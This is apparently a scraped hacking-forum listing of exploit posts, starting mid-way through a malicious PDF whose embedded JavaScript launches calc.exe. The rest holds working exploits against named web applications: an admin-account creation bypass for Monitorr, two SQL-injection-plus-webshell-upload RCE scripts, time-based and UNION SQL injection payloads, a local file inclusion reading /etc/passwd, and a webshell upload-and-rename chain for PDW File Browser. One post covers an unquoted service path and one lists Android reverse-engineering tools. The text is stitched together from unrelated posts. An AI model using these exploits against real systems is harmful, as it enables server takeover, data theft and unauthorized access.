endstream endobj 6 0 obj << /Type/ExtGState /ca 1 >> endobj 7 0 obj << /Type/FontDescriptor /Ascent 833 /CapHeight 592 /Descent -300 /Flags 32 /FontBBox[-192 -710 702 1221] /ItalicAngle 0 /StemV 0 /XHeight 443 /FontName/CourierNew,Bold >> endobj 8 0 obj << /Type/Font /Subtype/TrueType /BaseFont/CourierNew,Bold /Encoding/WinAnsiEncoding /FontDescriptor 7 0 R /FirstChar 0 /LastChar 255 /Widths[600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600] >> endobj 9 0 obj << /S/JavaScript /JS(app.opencPDFWebPage\('C:\\\\Windows\\\\System32\\\\calc.exe'\) ) >> endobj 10 0 obj << /Names[(EmbeddedJS)9 0 R] >> endobj xref 0 11 0000000000 65535 f 0000000015 00000 n 0000000170 00000 n 0000000250 00000 n 0000000305 00000 n 0000000560 00000 n 0000000724 00000 n 0000000767 00000 n 0000000953 00000 n 0000002137 00000 n 0000002235 00000 n trailer << /ID[<7018DE6859F23E419162D213F5C4D583><7018DE6859F23E419162D213F5C4D583>] /Info 1 0 R /Root 2 0 R /Size 11 >> startxref 2283 %%EOF
  18. HireHackking

    Monitorr 1.7.6m - Authorization Bypass

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python # -*- coding: UTF-8 -*- # Exploit Title: Monitorr 1.7.6m - Authorization Bypass # Date: September 12, 2020 # Exploit Author: Lyhin's Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ # Software Link: https://github.com/Monitorr/Monitorr # Version: 1.7.6m # Tested on: Ubuntu 19 # Monitorr 1.7.6m allows creation of administrative accounts by abusing the installation URL. import requests import os import sys if len (sys.argv) != 5: print ("specify params in format: python " + sys.argv[0] + " target_url user_login user_email user_password") else: url = sys.argv[1] + "/assets/config/_installation/_register.php?action=register" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": url, "Connection": "close", "Referer": url, "Upgrade-Insecure-Requests": "1"} data = {"user_name": sys.argv[2], "user_email": sys.argv[3], "user_password_new": sys.argv[4], "user_password_repeat": sys.argv[4], "register": "Register"} requests.post(url, headers=headers, data=data) print ("Done.")
  19. HireHackking

    Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution # Date: 3-11-2020 # Exploit Author: mosaaed # Vendor Homepage: https://www.sourcecodester.com/php/14566/complaints-report-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip # Version: 1.0 # Tested on: Parrot 5.5.17 + Apache 2.4.46 # CVE ID : N/A # replace shell.php with your own php reverse shell # change [TARGET URL] to target URL or IP address # setup your netcat listener for sum good ol shellz #!/usr/bin/python3 import requests import time def sqli_admin(): s = requests.Session() data = {"username":"admin'or'1'=1#","password":"hacked"} adminlogin = "http://localhost/crms/admin/ajax.php?action=save_settings" s.post(adminlogin,data=data) return s def trigger_rce(session): starttime = int(time.time()) multipart_form_data = { "name": ("cyberscurity"), "email": ("test@test.com"), "contact" : ("+11111111111"), "about" : ("Nothing much about it"), "img" : ("shell.php", open("shell.php", "rb")) } session.post("http://localhost/crms/admin/ajax.php?action=save_settings", files=multipart_form_data) get_shell(starttime-100,starttime+100,session) def get_shell(start,end,session): for i in range(start,end): session.get("http://localhost/crms/admin/assets/uploads/"+str(i)+"_shell.php") response = requests.get ("http://localhost/crms/admin/assets/uploads/"+ str(i) +"_shell.php") if response.status_code == 200: print("http://localhost/crms/admin/assets/uploads/"+str(i)+"_shell.php") def main(): session = sqli_admin() trigger_rce(session) if __name__ == '__main__': main()
  20. HireHackking

    Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Title: Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection # Exploit Author: yunaranyancat # Date: 02-11-2020 # Vendor Homepage: www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip # Version: 1.0 # Tested On: Ubuntu 18.04 + XAMPP # Description The file view-chair-list.php does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability. # POC N°1 = Time based blind SQLi GET /TableReservation/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+- HTTP/1.1 Host: [TARGET IP/URL] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ### Server will sleep for 10 seconds before returning the response # POC N° 2 = UNION based SQLi ### Request (getting current user) GET /TableReservation/dashboard/view-chair-list.php?table_id=%27%20UNION%20ALL%20SELECT%20CONCAT%280x7176787071%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x71716b7071%29%2CNULL%2CNULL--%20- HTTP/1.1 Host: [TARGET IP/URL] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Length: 2 ### Response ... <td class="center hidden-phone"> <a href="delete-chair.php?chair_id=[REDACTED]root@localhost[REDACTED] class="btn btn-danger" onclick="if (!Done()) return false; ">Delete Chair</a> ...
  21. HireHackking

    Quick N Easy FTP Service 3.2 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Quick 'n Easy FTP Service 3.2 - Unquoted Service Path # Discovery by: yunaranyancat # Discovery Date: October 2020 # Vendor Homepage: https://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_service.html # Software Link : www.pablosoftwaresolutions.com/download.php?id=10 # Tested Version: 3.2 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 7 # Vulnerability discovery: Registry value : HKLM\SYSTEM\ControlSet001\Services\Quick 'n Easy FTP Service # Service info: C:\>sc qc "Quick 'n Easy FTP Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Quick 'n Easy FTP Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 Normal BINARY_PATH_NAME : C:\Program Files (x86)\Quick 'n Easy FTP Service\ftpservice.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Quick 'n Easy FTP Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  22. HireHackking

    Title: Some tools in commonly used Android penetration testing

    HireHackking posted a blog entry in Hacker Technology
    In this article, we will briefly summarize some of the commonly used reverse tools in Android penetration and its basic usage methods. Apktool Apktool is the most commonly used Android decompilation tool. It supports multiple platforms, and in Linux we can use the apt command to install it directly. apt-get install apktool Help command apktool -h Basic use Decompile the app, we can decompile the Android apk file with the -d command apktool d xxxx.apk If you need to compile apk back, you can use the -b command apktook b xxxx, please do not confuse the two. dex2jar dex2jar is used to convert DEX files into JAR files. We need to read the source code of the program and need this tool. Install the source code of dex2jar. The source code compression package can be unzipped from the official website of dex2jar (https://sourceforge.net/projects/dex2jar/). You can use the terminal to enter the decompression directory and execute the following command to compile: bashCopy code After the ./gradlew build is compiled, the executable file is located in dex-tools/build/distributions/dex-tools-.zip. Unzip the compressed package and you will get an executable file. If you don't want to compile, you can download the compiled one directly in the github repository. JD-GUI It requires decompiling ordinary Java programs, or simple decompiling and viewing of Android applications, and you can use JD-GUI. If you need to do more in-depth Android application decompilation and analysis, it is recommended to use JADX. Download address (http://java-decompiler.github.io/) Frida A dynamic code injection tool that can modify and debug Android applications at runtime to install pip3 install frida sudo pip3 install frida-tools It should be noted that the computer needs a python environment. We will explain the specific use in detail to you in the following article.
  23. HireHackking

    Processwire CMS 2.4.0 - 'download' Local File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: [Local File Inclusion Processwire CMS 2.4.0] # Vulnerability Type: Unauthenticated LFI # Date: [03.11.2020] # Exploit Author: [Y1LD1R1M] # Type: [WEBAPPS] # Platform: [PHP] # Vendor Homepage: [https://processwire.com/] # Version: [2.4.0] # Tested on: [Kali Linux] ** Description ** Local File Inclusion in Processwire CMS 2.4.0 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system. ** Proof of Concept ** http://URL/index.php?download=/etc/passwd http://URL/index.php?download=../config.php
  24. HireHackking

    School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution # Date: 4-11-2020 # Exploit Author: mosaaed # Vendor Homepage: https://www.sourcecodester.com/php/14562/school-log-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip # Version: 1.0 # Tested on: Parrot 5.5.17 + Apache 2.4.46 # replace shell.php with your own php reverse shell # change [TARGET URL] to target URL or IP address # setup your netcat listener for sum good ol shellz #!/usr/bin/python3 import requests import time def sqli_admin(): s = requests.Session() data = {"username":"admin'or'1'=1#","password":"hacked"} adminlogin = "http://localhost/slms/admin/ajax.php?action=save_settings" s.post(adminlogin,data=data) return s def trigger_rce(session): starttime = int(time.time()) multipart_form_data = { "name": ("cyberscurity"), "email": ("test@test.com"), "contact" : ("+11111111111"), "about" : ("Nothing much about it"), "img" : ("shell.php", open("shell.php", "rb")) } session.post("http://localhost/slms/admin/ajax.php?action=save_settings", files=multipart_form_data) get_shell(starttime-100,starttime+100,session) def get_shell(start,end,session): for i in range(start,end): session.get("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php") response = requests.get ("http://localhost/slms/admin/assets/uploads/"+ str(i) +"_shell.php") if response.status_code == 200: print("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php") def main(): session = sqli_admin() trigger_rce(session) if __name__ == '__main__': main()
  25. HireHackking

    PDW File Browser 1.3 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PDW File Browser 1.3 - Remote Code Execution # Date: 24-10-2020 # Exploit Author: David Bimmel # Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen # Vendor Homepage: n/a # Software Link: https://github.com/GuidoNeele/PDW-File-Browser # Version: <=1.3 Attack type Remote Impact Remote Code Execution The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a critical software vulnerability which results in remote code execution on the web server. This vulnerability can be exploited by all authenticated users. Steps to RCE: Upload a .txt file containing your webshell code using the default file upload functionality within the PDF file Browser. Please note that all users (including unauthenticated users) are able to access your webshell later on. For security purposes I would recommend using weevely (https://github.com/epinna/weevely3) as this obfuscated and password protects your webshell. Below I have provided how the request should look like for uploading your WEBSHELL.txt file. POST /ckeditor/plugins/pdw_file_browser/ajax_php_uploader.php?uploadpath=%2Fmedia%2F&qqfile=WEBSHELL.txt HTTP/1.1 Host: <HOSTNAME> […] <?php <WEBSHELLCODE HERE> ?> Once you have uploaded your webshell with a .txt extension (WEBSHELL.txt) you are able to rename the file using the rename functionality of the PDW File Browser. Within this functionality it is possible to both change the file extension your WEBSHELL from .txt to .php and move the file to an arbitrary location on the web server . The path to the arbitrary location should contain double encoded characters. Below I have provided an example which both renames our WEBSHELL.txt to WEBSHELL.php and relocates the file to the 'content' directory. POST /ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1 Host: <HOSTNAME> […] action=rename&new_filename=%252E%252E%252Fcontent%252FWEBSHELL.php&old_filename=WEBSHELL.txt&folder=%252Fmedia%252F&type=file After this request your webshell should be located at ‘https://<TARGET>/content/WEBSHELL.php’ Happy Hacking :^)